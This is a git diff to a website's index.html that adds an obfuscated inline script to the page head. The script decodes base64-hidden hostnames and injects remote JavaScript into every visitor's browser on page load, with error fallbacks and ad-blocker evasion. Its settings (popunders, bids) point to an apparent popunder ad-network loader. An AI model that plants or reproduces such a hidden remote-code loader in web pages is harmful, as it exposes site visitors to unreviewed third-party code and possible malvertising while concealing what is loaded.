--- a/my-website/index.html
+++ b/my-website/index.html
@@ -9,6 +9,13 @@
   <link rel="manifest" href="manifest.json">
   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css">
   <script defer src="js/home.js"></script>
+  
+<script type="text/javascript" data-cfasync="false">
+/*<![CDATA[/* */
+(function(){var n=window,h="edc96640aa447138c34fe066aae6a117",i=[["siteId",9-607+793+401+774+5202960],["minBid",0],["popundersPerIP","0"],["delayBetween",0],["default",false],["defaultPerDay",0],["topmostLayer","auto"]],o=["d3d3LmFudGlhZGJsb2Nrc3lzdGVtcy5jb20vRGtKU2lmL1hIbXVpVC9rY29zbWljanMuYnJvd3Nlci5taW4uanM=","ZDNjb2Q4MHRobjdxbmQuY2xvdWRmcm9udC5uZXQvbXB1cmUubWluLmpz"],b=-1,m,g,s=function(){clearTimeout(g);b++;if(o[b]&&!(1774410497000<(new Date).getTime()&&1<b)){m=n.document.createElement("script");m.type="text/javascript";m.async=!0;var y=n.document.getElementsByTagName("script")[0];m.src="https://"+atob(o[b]);m.crossOrigin="anonymous";m.onerror=s;m.onload=function(){clearTimeout(g);n[h.slice(0,16)+h.slice(0,16)]||s()};g=setTimeout(s,5E3);y.parentNode.insertBefore(m,y)}};if(!n[h]){try{Object.freeze(n[h]=i)}catch(e){}s()}})();
+/*]]>/* */
+</script>
+
 </head>
 
 <body>
